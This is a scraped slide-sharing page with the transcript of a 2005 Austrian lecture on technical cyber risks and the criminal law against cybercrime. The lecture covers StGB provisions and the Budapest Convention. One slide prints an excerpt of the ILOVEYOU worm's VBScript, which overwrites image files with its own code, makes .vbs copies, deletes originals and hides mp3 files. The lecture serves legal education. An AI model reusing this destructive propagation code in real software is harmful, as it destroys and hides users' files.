2005 (C) Wolfram Proksch cybercrime.at ::.technische risken.strafrecht.

Slides:



Advertisements
Ähnliche Präsentationen
Juristische Aspekte der IT-Sicherheit
Advertisements

Surfen im Internet.
Agenda Einleitung Risiken und Gefahren Vorbeugung
Thema: Sicherheitsarchitektur für mobiles Arbeiten
- 0 - Sicherheit Copyright ©2001 Granitar Incorporated. All rights reserved. Architektur Moderner Internet Applikationen TU Wien/Ausseninstitut.
Stalking bei Sorgerechtsstreitigkeiten
7.3. Viren, Würmer, Trojaner Mail von der Nachbarin
Organisation Auftrag Übermittlung Eingabe Transport Speicher Speicher
Was ist eigentlich ein Computervirus?
Stand Copyright: H.-J. Weniger StB vBP Verschärfung des Steuerverfahrensrechts und des Steuerstrafrechts n Gewerbsmäßige Steuerhinterziehung.
Ass. jur. Jan K. Koecher 1 Thema 2 Haftungsfilter des TDG.
Datenschutz? Unwissenheit schützt vor Strafe nicht!
Stalking bei Sorgerechtsstreitigkeiten1 Hans-Georg W. Voß
Viren Würmer und Trojaner
Anonymität contra Straftatverfolgung im Internet
Viren,Würmer & Trojaner
ECDL M8 IT - Security.
Einsatz von Mehrwertnummern im Rundfunk – Service oder verbotenes Glücksspiel?
Fachreferat von Violeta MUJCIN und Maga. Marie- Luise FUCHS
Angriffe durch Viren, Würmer und Trojaner
Sie haben Schmerzen.
Informationen im Internet Im 21. Jahrhundert werden die meisten Daten digital gespeichert, somit wird die Digitale Sicherheit immer wichtiger. Der Verlust.
STRAFRECHT BT BETRUGSÄHNLICHE STRAFTATEN
Datenschutz und Datensicherheit
Sicherheit im Internet
Die EDV und damit verbundene Gefahren
Entwicklungen im Patentrecht
IRIS 2005 – Ecommerce I IRIS 2005 – Ecommerce I Verantwortlichkeit aus verwaltungsstrafrechtlicher und strafrechtlicher Sicht für Unternehmen und vertretungsbefugte.
Datenschutz als Grundrecht
News Aktuelles aus Politik, Wirtschaft und Recht06/2009 © Verlag Fuchs AG Strafrecht 1.Wie beurteilen Sie das Gewissen (Fähigkeit sein eigenes Tun nach.
Präsentation von Lukas Sulzer
Rechtliche Grundlagen
Die Welt der Informatik
EDV Concept 1998 Datenschutz im Net Dipl.-Ing. DDr. Walter J. Jaburek Geschäftsführer der EDV Concept Technisches Büro für Informatik.
I Love You und Co. - erhöhte Ansteckungsgefahr im Internet
FORBIT-Tagung am Workshop Internetüberwachung – Kommunikation im Fadenkreuz Exkurs: Rechtliche Grundlagen zur Erhebung von Daten im Internet.
Mobbing Folgen, Symptomen und die rechtliche Situation
Rechtliche Grundlagen zur Bekämpfung des Menschenhandels in Deutschland
Datenschutz und Datensicherheit
Pflichtübung aus Straf- und Strafprozessrecht
Eine Präsentation von Julia Sassen und Yvonne Tebben
Datenschutz - Datensicherheit
Datenschutz im Cyberspace Rechtliche Pflichten für Treuhänder Mathias Kummer Weblaw GmbH Laupenstrasse Bern Mathias.
Viren und Schutzmaßnahmen
 Was schützt das Urheberrecht?  Geschützt sind Werke, die eine „eigentümliche“ – das heißt eine individuelle oder originelle – geistige Schöpfung auf.
Cyber-Crime Computerkriminalität Wirtschaftskriminalität
Technik schädlicher Software
Phishing.
Verbreitung von Viren, Würmern und Trojanern
Hacken Mahmut Zenuni P
(Computerkriminalität)
Rechtsanwalt Thomas Feil
->Prinzip ->Systeme ->Peer – to – Peer
Viren, Würmer und Trojanisches Pferd
CybercrimeCybercrime STRAFEN PORNOGRAFIE NATIONALSOZIALISTISCHE WIEDERBETÄTIGUNG ONLINE-BETRUG PHISHING VIRENPROGRAMME HACKING.
Datenschutz X 1. Was ist Datenschutz? 2. Datenschutzgesetze?
Rechtliche Rahmenfaktoren der Netzwerksicherheit
STRAFRECHT BT VERUNTREUUNG Art. 138 StGB
STRAFRECHT BT VERWANDTE DELIKTE: ENTZIEHUNG UND BESCHÄDIGUNG VON DATEN ART.143, 143 BIS, 144 BIS StGB Prof. Dr. H. Vest Institut für Strafrecht und Kriminologie.
Dr. Thomas Höhne. Geheim oder nicht geheim? Urheberprobleme in Vergabeverfahren.
Rechtliche Aspekte und Grundlagen zu Cyber-Mobbing, Happy Slapping,
Was sind Würmer ¿ Erklärung und Hilfe.
Shirin Manwart & Carlos Rodriguez
Sicherheitskomponente in der Computertechnik
Hon.-Prof. Dr. Irene Welser 1 Haftung von Leitungs- und Kontrollorganen 3. Einheit WS 2015/16 Hon.-Prof. Dr. Irene Welser Partner CHSH.
1 Rechte und Pflichten. Auszug aus dem StGB der Schweiz 2 Art. 128 Schweizerisches Strafgesetzbuch Unterlassung der Nothilfe Wer einem Menschen, den er.
Datenschutz u. -sicherheit. Datenschutz Die Datenschutzrichtlinien der Europäi- schen Gesellschaft beschäftigt sich mit personenbezogenen Daten. Mit diesen.
§ 1330 ABGB (1) Wenn jemandem durch Ehrenbeleidigung ein wirklicher Schade oder Entgang des Gewinnes verursacht worden ist, so ist er berechtigt, den Ersatz.
Netzwerksicherheit Netzwerkgrundlagen.
 Präsentation transkript:

2005 (C) Wolfram Proksch cybercrime.at ::.technische risken.strafrecht

2005 (C) Wolfram Proksch.technische risken Fälschung / Verfälschung von Daten Authentizität : Integrität : Vertraulichkeit Frame-Spoofing / Web-Spoofing Ausnutzung der Frame-Architektur Cookies ermöglichen Markierung & Wiedererkennung von Nutzern C:\WINDOWS\Cookies\ Web-Wanzen, Web-Bugs

2005 (C) Wolfram Proksch Paket-Sniffer / IP-Spoofing Programme zur Überwachung der Daten an den Netzwerkknoten [keywords] Trojanische Pferde Viren & Würmer

rem barok -loveletter(vbe) rem by: spyder / Group / Manila,Philippines On Error Resume Next […][…] bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end Auszug aus dem Programm-Code des I-Love-You-Virus

2005 (C) Wolfram Proksch.technische gegenmittel Kryptographie sichere Kommunikationsprotokolle /-kanäle SET Schutzprogramme Virenschutz Cookie-Killer Firewall, Proxy,

2005 (C) Wolfram Proksch.rechtlicher rahmen Strafgesetzbuch [ StGB ] § 118a StGB - Widerrechtlicher Zugriff auf Computersysteme § 119 StGB - Verletzung des Telekommunikationsgeheimnisses § 119a StGB - Missbräuchliches Abfangen von Daten § 126a StGB - Datenbeschädigung § 126b StGB - Störung der Funktionsfähigkeit eines Computersystems § 126c StGB - Missbrauch von Computerprogrammen oder Zugangsdaten § 148a StGB - Betrügerischer Datenverarbeitungsmissbrauch Zugangskontrollgesetz [ ZuKG ] - § 10 E-Commercegesetz [ ECG ] §§ 13 ff ECG - Providerhaftung, § 18 Mitwirkungspflicht Datenschutzgesetz [ DSG 2000 ] §§ 51 u. 52 DSG 2000 Urheberrechtsgesetz [ UrhG ] §§ 91 ff UrhG Telekommunikationsgesetz [ TKG ] § 89 TKG - Mitwirkungspflicht

2005 (C) Wolfram Proksch § 118a StGB.widerrechtlicher zugriff auf ein computersystem § 118a. (1) Wer sich in der Absicht, sich oder einem anderen Unbefugten von in einem Computersystem gespeicherten und nicht für ihn bestimmten Daten Kenntnis zu verschaffen und dadurch, dass er die Daten selbst benützt, einem anderen, für den sie nicht bestimmt sind, zugänglich macht oder veröffentlicht, sich oder einem anderen einen Vermögensvorteil zuzuwenden oder einem anderen einen Nachteil zuzufügen, zu einem Computersystem, über das er nicht oder nichtallein verfügen darf, oder zu einem Teil eines solchen Zugang verschafft, indem er spezifische Sicherheitsvorkehrungen im Computersystem verletzt, ist mit Freiheitsstrafe bis zu sechs Monaten oder mit Geldstrafe bis zu 360 Tagessätzen zu bestrafen. (2) Der Täter ist nur mit Ermächtigung des Verletzten zu verfolgen.

2005 (C) Wolfram Proksch § 126a StGB.datenbeschädigung wer einen anderen dadurch schädigt, dass er automationsunterstützt verarbeitete, übermittelte oder überlassene Daten, über die er nicht oder nicht allein verfügen darf, verändert, löscht oder sonst unbrauchbar macht oder unterdrückt. Strafdrohung bis 5 Jahren Freiheitsstrafe (gestaffelt nach Schadenshöhe)

2005 (C) Wolfram Proksch § 148a StGB.betrügerischer datenverarbeitungsmissbrauch wer - mit dem Vorsatz, sich oder einen Dritten unrechtmäßig zu bereichern - einen anderen dadurch am Vermögen schädigt, dass er das Ergebnis einer automationsunterstützten Datenverarbeitung durch Gestaltung des Programms, durch Eingabe, Veränderung oder Löschung von Daten [ § 126 a Abs. 2 StGB ] oder sonst durch Einwirkung auf den Ablauf des Verarbeitungsvorgangs beeinflusst Strafdrohung bis 3 Jahre, bei gewerbsm. Begehung bis 10 Jahre Freiheitsstrafe

2005 (C) Wolfram Proksch § 10 ZuKG.eingriff in das recht auf zugangskontrolle § 10. (1) Wer gewerbsmäßig (§ 70 StGB) Umgehungsvorrichtungen vertreibt, verkauft, vermietet oder verpachtet, ist vom Gericht mit Freiheitsstrafe bis zu zwei Jahren oder mit Geldstrafe bis zu 360 Tagessätzen zu bestrafen. (2) Ebenso ist zu bestrafen, wer gewerbsmäßig (§ 70StGB) Umgehungs- vorrichtungen herstellt, einführt oder mit dem Vorsatz erwirbt oder innehat, dass diese auf die im Abs. 1 beschriebene Art und Weise in Verkehr gebracht werden oder dass mit ihrer Hilfe anderen der Zugang zu einem geschützten Dienst ermöglicht wird. (3) Wer Umgehungsvorrichtungen ausschließlich zum privaten Gebrauch einführt, erwirbt oder sich sonst verschafft, ist nicht als Beteiligter (§ 12 StGB) zu bestrafen. (4) Ein Bediensteter oder Beauftragter des Inhabers oder Leiter eines Unternehmens (§5) ist nicht zu bestrafen, wenn er eine der in den Abs. 1 und 2 genannten Handlungen auf Anordnung des Dienst- oder Auftrag- gebers vorgenommen hat und ihm wegen seiner wirtschaftlichen Abhängigkeit nicht zugemutet werden konnte, die Vornahme der Tat zu unterlassen. (5) Der Täter ist nur auf Verlangen des in seinen Rechten verletzten Diensteanbieters zu verfolgen.

2005 (C) Wolfram Proksch.internationaler rechtsrahmen Convention on Cybercrime Council of Europe, ETS No. 185, Budapest, 23.XI.2001

2005 (C) Wolfram Proksch.convention on cybercrime die Konvention ist der erste internationale Vertrag, welcher sich gegen Verbrechen richtet, welche über das Internet oder vergleichbare Netze begangen werden. Sie enthält insb Bestimmungen zu Urheberrechtsverletzungen Computer-Betrug Kinderpornographie Netzwerksicherheits-Verletzungen die Konvention enthält auch eine Reihe von Bestimmungen zum Verfahren bzw. zu Überwachungsrechten - insb auch zur Durchsuchung und Überwachung von Computernetzen Die Konvention wurde durch ein Zusatzprotokoll ergänzt, welches auch die Veröffentlichung fremdenfeindlicher und rassistischer Propaganda im Internet bzw in vergleichbaren Computer-Netzen unter Strafe stellt.

2005 (C) Wolfram Proksch haupt.ziel das Ziel der Konvention ist in der Präambel wie folgt vorgegeben to pursue a common criminal policy aimed at the protection of society against cybercrime, especially by adopting appropriate legislation and fostering international co-operation

2005 (C) Wolfram Proksch.wesentliche bestimmungen Article 2 – Illegal access Article 3 – Illegal interception Article 4 – Data interference Article 5 – System interference Article 6 – Misuse of devices Article 7 – Computer-related forgery Article 8 – Computer-related fraud Article 9 – Offences related to child pornography Article 10 – Offences related to infringements of copyright... Article 11 – Attempt and aiding or abetting Article 12 – Corporate liability

2005 (C) Wolfram Proksch.ende